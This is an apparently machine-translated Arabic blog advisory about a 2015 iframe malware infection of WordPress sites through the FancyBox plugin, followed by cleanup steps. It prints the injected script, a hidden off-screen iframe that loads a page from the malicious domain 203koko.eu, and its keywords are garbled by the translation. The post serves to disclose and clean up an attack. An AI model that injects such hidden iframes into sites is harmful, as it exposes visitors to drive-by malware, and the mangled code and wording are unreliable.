[IFRAME البرامج الضارة 203koko] البرامج الضارة مواقع وورد المصابين

في وقت سابق من هذا الاسبوع عدد من المواقع، وبلوق وورد، تلقوا تحذيرات عدوى البرامج الضارة من خلال المواقع جوجل.

المشكلة التي المواقع جوجل يشار إلى هو وجود سمك القد / سيناريو iframe malware المواقع المصدر.

<script> إذا (navigator.userAgent.match (/ MSIE / ط)) {دوكمنت ( '<div النمط = "الموقف: مطلقة؛ اليسار: -2000px، العرض: 2000px"> <IFRAME SRC = "HTTP: / /203koko.eu/hjnfh/ipframe2.php "العرض =" 20 "ارتفاع =" 30 "> </ iframe> حفظ </ div> ')؛ } </ script>

ويبدو أنه هو حساسية a المساعدالمكتسبات FancyBox لورد التي كانت حتى لم تم تحديثها أمس (05.02.2015) لفترة طويلة.
حل هذه المشكلة و تطهير المواقع الفيروسات مع هذه البرامج الضارة ، بسيطة نسبيا.
1. تعطيل المكون الإضافي FancyBox.
2. احذف جميع ملفات FancyBox الإضافية من الخادم (عبر FTP)
3. تثبيت الإصدار الجديد من المكون الإضافي (Fancybox 3.0.4)

Fancybox لورد 3.0.4

- إعادة تسمية الإعداد المتأثر بمشكلة الأمان المذكورة في 3.0.3. يجب أن يؤدي ذلك إلى إيقاف ظهور الشفرة الضارة في المواقع التي يتم تحديث المكوِّن الإضافي لها دون إزالة الشفرة الضارة.

Fancybox لورد 3.0.3

- الثابتة قضية أمنية.

معلومات البرامج الضارة:

نوع العقار: الإطار من إعادة توجيه
الهدف: Fancybox وورد
DOMAIN البرمجيات الخبيثة: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
البرمجيات الخبيثة الخام CODE: <IFRAME SRC = "http://203koko.eu/hjnfh/ipframe2.php" العرض = "20" ارتفاع = "30"> </ iframe> أراء
البرمجيات الخبيثة SCRIPT: <script> إذا (navigator.userAgent.match (/ MSIE / ط)) {دوكمنت ('<div النمط = "الموقف: مطلقة؛ اليسار: -2000px؛ العرض: 2000px">

إزالة البرامج الضارة من موقع الويب الخاص بك وورد.

[IFRAME البرامج الضارة 203koko] البرامج الضارة مواقع وورد المصابين

عن المؤلف

الشبح LP

مؤسس ورئيس تحرير إعدادات الشبحفي تاريخ 2006.
تجربة في أنظمة تشغيل Linux (خاصة CentOS) ، Mac OS X ، Windows XP> Windows 10 وورد (CMS).

اترك تعليق